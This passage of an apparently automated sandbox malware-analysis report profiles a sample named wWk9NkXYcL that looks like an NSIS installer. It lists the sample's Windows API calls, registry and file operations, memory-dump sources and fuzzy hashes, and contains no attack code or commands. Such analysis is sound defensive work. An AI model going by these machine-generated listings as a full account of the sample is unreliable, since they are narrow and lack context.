                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                    • String ID: F
                    • API String ID: 941294808-1304234792
                    • Opcode ID: 6ff7da4ded68621eb9ecef41b220d021edcb146cdc93fa7e0b1181698ae2407c
                    • Instruction ID: 5d70bd818855421fa823bf0ed1b165e0401977292747d9ede3c4f118d7b178ba
                    • Opcode Fuzzy Hash: 6ff7da4ded68621eb9ecef41b220d021edcb146cdc93fa7e0b1181698ae2407c
                    • Instruction Fuzzy Hash: BB515A71400209AFCF058F95DE459AF7FB9EF44311F04802AF992AA1A0CB38DA55DFA4
                    APIs
                    • GetVersion.KERNEL32(00447D88,?,00000000,00404AAA,00447D88,00000000,00423179,771B23A0,00000000), ref: 0040619B
                    • GetSystemDirectoryW.KERNEL32(LimePhillips,00002004), ref: 0040621D
                      • Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5
                      • Part of subcall function 004060CA: SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040626C
                      • Part of subcall function 004060CA: SHGetPathFromIDListW.SHELL32(?,LimePhillips), ref: 0040627A
                      • Part of subcall function 004060CA: CoTaskMemFree.OLE32(?), ref: 00406285
                    • GetWindowsDirectoryW.KERNEL32(LimePhillips,00002004), ref: 00406230
                    • lstrcatW.KERNEL32(LimePhillips,\Microsoft\Internet Explorer\Quick Launch), ref: 004062AA
                    • lstrlenW.KERNEL32(LimePhillips,00447D88,?,00000000,00404AAA,00447D88,00000000,00423179,771B23A0,00000000), ref: 0040630C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrcpynlstrlen
                    • String ID: LimePhillips$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                    • API String ID: 3935908587-3470335876
                    • Opcode ID: d404f1267a91f84120ed82a5726344723f4104790e5192d29b3fdddb81e5045c
                    • Instruction ID: faf527bbbd80b2f6d96589bc921f5814a8c68153425bf04786751db3c9b8505d
                    • Opcode Fuzzy Hash: d404f1267a91f84120ed82a5726344723f4104790e5192d29b3fdddb81e5045c
                    • Instruction Fuzzy Hash: A2711531900215AADF20AF68CC4467E33B4EB55314F12817FE947BA2E1D73D89A2CB9D
                    APIs
                    • GetWindowLongW.USER32(?,000000EB), ref: 0040396C
                    • GetSysColor.USER32(00000000), ref: 00403988
                    • SetTextColor.GDI32(?,00000000), ref: 00403994
                    • SetBkMode.GDI32(?,?), ref: 004039A0
                    • GetSysColor.USER32(?), ref: 004039B3
                    • SetBkColor.GDI32(?,?), ref: 004039C3
                    • DeleteObject.GDI32(?), ref: 004039DD
                    • CreateBrushIndirect.GDI32(?), ref: 004039E7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                    • String ID:
                    • API String ID: 2320649405-0
                    • Opcode ID: 6e8c2a3615f2505a185ac55974dadb6ac4ac18c0c35a8d3832bbfc0dda71d657
                    • Instruction ID: fd505c26376d0b004dab163c32b6598f7c3f39bfa23b8c101552dd0b32be6230
                    • Opcode Fuzzy Hash: 6e8c2a3615f2505a185ac55974dadb6ac4ac18c0c35a8d3832bbfc0dda71d657
                    • Instruction Fuzzy Hash: 931166B15007446BC7219F68DE08B5BBFFCAF05715F05892DF886E22A0D774DA48CB54
                    APIs
                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402A83
                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,00000000), ref: 00402AA0
                    • GlobalFree.KERNEL32(?), ref: 00402AD7
                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00402AEB
                    • GlobalFree.KERNEL32(00000000), ref: 00402AF2
                    • CloseHandle.KERNEL32(?), ref: 00402B09
                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402B1C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                    • String ID:
                    • API String ID: 3294113728-0
                    • Opcode ID: 2a415ac0b65e7ed1e85d085157a57941f96e69fc1561960092c6122626d45b92
                    • Instruction ID: 9e4a56611826f2756eb4244239c06745681650eb98283bcdfa384ecb69a0f049
                    • Opcode Fuzzy Hash: 2a415ac0b65e7ed1e85d085157a57941f96e69fc1561960092c6122626d45b92
                    • Instruction Fuzzy Hash: 13219832D00114BBCB216FA5DE49E9F7F79DF49724F10423AF925761E1CB7848119BA8
                    APIs
                    • lstrlenW.KERNEL32(00447D88,00423179,771B23A0,00000000), ref: 00404AAB
                    • lstrlenW.KERNEL32(0040304D,00447D88,00423179,771B23A0,00000000), ref: 00404ABB
                    • lstrcatW.KERNEL32(00447D88,0040304D,0040304D,00447D88,00423179,771B23A0,00000000), ref: 00404ACE
                    • SetWindowTextW.USER32(00447D88,00447D88), ref: 00404AE0
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404B06
                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00404B20
                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00404B2E
                      • Part of subcall function 004060CA: GetVersion.KERNEL32(00447D88,?,00000000,00404AAA,00447D88,00000000,00423179,771B23A0,00000000), ref: 0040619B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                    • String ID:
                    • API String ID: 2740478559-0
                    • Opcode ID: 141fa25f867edaa8b9051ab2f09e4248f19e9da238f05a8cd45e618e6a3e53c0
                    • Instruction ID: 484fc1ca55a69b1daf8ef76b765ed66def062ae06368be70f68da4f473989c37
                    • Opcode Fuzzy Hash: 141fa25f867edaa8b9051ab2f09e4248f19e9da238f05a8cd45e618e6a3e53c0
                    • Instruction Fuzzy Hash: A221B3B1900518BADF119F65DC84E9EBFB9FF84314F10413AFA04B22A0C7788A80DF58
                    APIs
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0040436A
                    • GetMessagePos.USER32 ref: 00404372
                    • ScreenToClient.USER32(?,?), ref: 0040438A
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040439C
                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004043C2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Message$Send$ClientScreen
                    • String ID: f
                    • API String ID: 41195575-1993550816
                    • Opcode ID: 0fd0a508c23a1f4cc7d109850199a12f342c67c69df64cb0c481c89d05409d64
                    • Instruction ID: 785f0416c38af9d8ad27fcbae1db7caa358ffe27c450e4d5cf04d3572e5fe4cd
                    • Opcode Fuzzy Hash: 0fd0a508c23a1f4cc7d109850199a12f342c67c69df64cb0c481c89d05409d64
                    • Instruction Fuzzy Hash: B0017171A4021DBAEB00DBA4DD85FEEBBBCAF55714F10012BFB50B61D0C7B49A418B65
                    APIs
                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD2
                    • MulDiv.KERNEL32(00052A00,00000064,01630000), ref: 00402DFD
                    • wsprintfW.USER32 ref: 00402E0D
                    • SetWindowTextW.USER32(?,?), ref: 00402E1D
                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E2F
                    Strings
                    • verifying installer: %d%%, xrefs: 00402E07
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Text$ItemTimerWindowwsprintf
                    • String ID: verifying installer: %d%%
                    • API String ID: 1451636040-82062127
                    • Opcode ID: a052d906e27c43246bcc9f1aeeeeed0a4803bb8fb5ea3e7766d01d4d8a37771c
                    • Instruction ID: aa47155a64d8ebbb4a0163e37034f34a23c06eccf97bc0b219fefb1598c68ac6
                    • Opcode Fuzzy Hash: a052d906e27c43246bcc9f1aeeeeed0a4803bb8fb5ea3e7766d01d4d8a37771c
                    • Instruction Fuzzy Hash: 25014470640108BBDF109F64DD49FAE3BA9AB04304F004139FA06A51E0DBB989558F58
                    APIs
                    • CharNextW.USER32(?,*?|<>/":,00000000,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B4A
                    • CharNextW.USER32(?,?,?,00000000), ref: 00405B59
                    • CharNextW.USER32(?,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B5E
                    • CharPrevW.USER32(?,?,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B72
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Char$Next$Prev
                    • String ID: *?|<>/":
                    • API String ID: 589700163-165019052
                    • Opcode ID: b7b5818da4b4a2654bbca5167226ce5d18b2b6f4b0368041995d2741e331b462
                    • Instruction ID: 31febb90154ecf465c6c3fd58460301c566faf6ecd06643fefb4dc305e878468
                    • Opcode Fuzzy Hash: b7b5818da4b4a2654bbca5167226ce5d18b2b6f4b0368041995d2741e331b462
                    • Instruction Fuzzy Hash: B9118E15810A1599CB30BB298840E7BB7F8EE95750750853FED85B32C1E778BC81CABD
                    APIs
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014B9
                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014F5
                    • RegCloseKey.ADVAPI32(?), ref: 004014FE
                    • RegCloseKey.ADVAPI32(?), ref: 00401523
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401541
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Close$DeleteEnumOpen
                    • String ID:
                    • API String ID: 1912718029-0
                    • Opcode ID: 9a7fa1e295040e987171b31cb3058b13b4927fc82cebbafdfd6fdbcfdef2d769
                    • Instruction ID: 18dccf383a29a435c3c5d53fdb083507bb3959694e3d248e427a957da49423c4
                    • Opcode Fuzzy Hash: 9a7fa1e295040e987171b31cb3058b13b4927fc82cebbafdfd6fdbcfdef2d769
                    • Instruction Fuzzy Hash: B8113776500108FBDF119FA0DE85AAE3B7DEB45348F00443AF90AB51B0D7359E94AE69
                    APIs
                    • GetFileVersionInfoSizeW.VERSION(00000000,?), ref: 004020BF
                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?), ref: 004020E0
                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 004020F8
                    • VerQueryValueW.VERSION(?,004082C8,?,?,?,00000000,00000000,00000000), ref: 00402111
                      • Part of subcall function 004059FF: wsprintfW.USER32 ref: 00405A0C
                    • GlobalFree.KERNEL32(007B9B50), ref: 00402139
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                    • String ID:
                    • API String ID: 3376005127-0
                    • Opcode ID: 1fcda80dc11e1363c08de8126c867463e0ce0b74cafb0b4a8e36d66cc7975c69
                    • Instruction ID: ca10dc8ef845363045b229a4896d1fbdc02f34fd782a724fb491659cb49530f2
                    • Opcode Fuzzy Hash: 1fcda80dc11e1363c08de8126c867463e0ce0b74cafb0b4a8e36d66cc7975c69
                    • Instruction Fuzzy Hash: 11116A72900204ABDB11ABA5DE08A9E77B9AF04354F108136F605FA1E0EB78D940CB58
                    APIs
                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,00000000,00000002,?), ref: 00401DDF
                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401DF7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: MessageSend$Timeout
                    • String ID: !
                    • API String ID: 1777923405-2657877971
                    • Opcode ID: 0a2216d3efa57a78be66af89e8cb1db1661eab1c73c2f6238fd6ec7ea61d154f
                    • Instruction ID: 2bd8fc9b8c4150d32bad90dfffc0448b15bb1a7470975d4e46508bb72c72871e
                    • Opcode Fuzzy Hash: 0a2216d3efa57a78be66af89e8cb1db1661eab1c73c2f6238fd6ec7ea61d154f
                    • Instruction Fuzzy Hash: 77216071940218AADB15AFB4C946BFD7BB5EF05309F10857EFA02B50E1D77C8A809758
                    APIs
                    • lstrlenW.KERNEL32(0044FD98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,0044FD98,?), ref: 00403FB0
                    • wsprintfW.USER32 ref: 00403FBD
                    • SetDlgItemTextW.USER32(?,0044FD98,000000DF), ref: 00403FD0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: ItemTextlstrlenwsprintf
                    • String ID: %u.%u%s%s
                    • API String ID: 3540041739-3551169577
                    • Opcode ID: 7463db91dfc42c9920fcb0c5be4cc11050eaef945611b5cb4dc0a4985e01960d
                    • Instruction ID: 5fad3c86b264af19ee74e6bf29dedfa0a61a2e47495169cbabc6e73bcd4b5a17
                    • Opcode Fuzzy Hash: 7463db91dfc42c9920fcb0c5be4cc11050eaef945611b5cb4dc0a4985e01960d
                    • Instruction Fuzzy Hash: 12117D32B002087BCB10DB699D41E9E766EEBD5338F10423BF519F31E0EA388A15875C
                    APIs
                    • RegCreateKeyExW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00402546
                    • lstrlenW.KERNEL32(004120F8), ref: 00402567
                    • RegSetValueExW.ADVAPI32(?,?,00000000,?,004120F8,00000000), ref: 004025A6
                    • RegCloseKey.ADVAPI32(?), ref: 004025B6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: CloseCreateValuelstrlen
                    • String ID:
                    • API String ID: 1356686001-0
                    • Opcode ID: eb21bdfbd278206649cafd0a134e8c3462c0890b110457211e04b26388198419
                    • Instruction ID: e0ce6b6c9d891c2747ed896ffb728d3f7ff2228f80022de3c727e62f6400905b
                    • Opcode Fuzzy Hash: eb21bdfbd278206649cafd0a134e8c3462c0890b110457211e04b26388198419
                    • Instruction Fuzzy Hash: 6F21B071A00204BBEB10AF65DE89FAF7779EB44714F10813BF504B61E1D7B89A809B6C
                    APIs
                      • Part of subcall function 00404A73: lstrlenW.KERNEL32(00447D88,00423179,771B23A0,00000000), ref: 00404AAB
                      • Part of subcall function 00404A73: lstrlenW.KERNEL32(0040304D,00447D88,00423179,771B23A0,00000000), ref: 00404ABB
                      • Part of subcall function 00404A73: lstrcatW.KERNEL32(00447D88,0040304D,0040304D,00447D88,00423179,771B23A0,00000000), ref: 00404ACE
                      • Part of subcall function 00404A73: SetWindowTextW.USER32(00447D88,00447D88), ref: 00404AE0
                      • Part of subcall function 00404A73: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404B06
                      • Part of subcall function 00404A73: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00404B20
